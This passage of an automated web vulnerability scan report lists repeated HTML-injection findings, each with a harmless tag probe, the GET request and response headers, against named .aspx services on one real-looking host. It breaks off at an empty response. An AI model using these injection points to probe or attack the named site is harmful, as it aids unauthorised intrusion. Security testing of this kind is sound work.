This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793e429d<a>9a69387f93 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:23:21 GMT Connection: close Content-Length: 20165
1.67. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e29d7<a>b1a3288f611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&e29d7<a>b1a3288f611=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:46 GMT Content-Length: 22408 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 498aa<a>e0fd8eb2d55 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793498aa<a>e0fd8eb2d55 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:45 GMT Content-Length: 22396 Connection: close
1.69. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6a8d2<a>17423d31d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&6a8d2<a>17423d31d6d=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:51 GMT Content-Length: 5637 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dc61b<a>d0ae21d4f0d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793dc61b<a>d0ae21d4f0d HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:50 GMT Content-Length: 5625 Connection: close
1.71. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86197<a>4a43d3f7b2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&86197<a>4a43d3f7b2b=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:23:22 GMT Connection: close Content-Length: 27398
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload b9c7e<a>35d09de45cf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793b9c7e<a>35d09de45cf HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:23:21 GMT Connection: close Content-Length: 27386
1.73. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5469e<a>513a789c5d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&5469e<a>513a789c5d2=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:50 GMT Content-Length: 8814 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 73e9a<a>69fb6f0fe85 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379373e9a<a>69fb6f0fe85 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:49 GMT Content-Length: 8802 Connection: close
1.75. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ccd3<a>bf3a55c6529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&4ccd3<a>bf3a55c6529=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:50 GMT Content-Length: 5534 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload cf92f<a>bc8ac13f1f3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793cf92f<a>bc8ac13f1f3 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 02:38:48 GMT Content-Length: 5522 Connection: close
1.77. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 764aa<a>4eb8c021511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&764aa<a>4eb8c021511=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:02 GMT Content-Length: 1913 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dd15e<a>c58085d49ac was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796dd15e<a>c58085d49ac HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:00 GMT Content-Length: 1907 Connection: close
1.79. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8592<a>7f38885c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&d8592<a>7f38885c00=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:45:47 GMT Connection: close Content-Length: 20177
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload af957<a>c761acd24e8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796af957<a>c761acd24e8 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:45:46 GMT Connection: close Content-Length: 20169
1.81. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8bdb6<a>f2e8c6d2662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&8bdb6<a>f2e8c6d2662=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:04 GMT Content-Length: 22408 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 8c544<a>375738d4296 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337968c544<a>375738d4296 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:01 GMT Content-Length: 22396 Connection: close
1.83. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38157<a>7e8dbb9295c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&38157<a>7e8dbb9295c=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:10 GMT Content-Length: 5637 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4d574<a>afe51a628d3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964d574<a>afe51a628d3 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:08 GMT Content-Length: 5625 Connection: close
1.85. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15b26<a>94660917f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&15b26<a>94660917f43=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:45:45 GMT Connection: close Content-Length: 27398
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 97afc<a>1b27d99bc68 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379697afc<a>1b27d99bc68 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:45:43 GMT Connection: close Content-Length: 27386
1.87. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47c22<a>ef7e3604f7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&47c22<a>ef7e3604f7f=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:10 GMT Content-Length: 8814 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 3dd0c<a>b8631e28575 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337963dd0c<a>b8631e28575 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:07 GMT Content-Length: 8802 Connection: close
1.89. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6ec5<a>cd69370a51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&b6ec5<a>cd69370a51b=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Tue, 08 Feb 2011 04:45:07 GMT Content-Length: 5534 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4f192<a>a7b9e42493c was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964f192<a>a7b9e42493c HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
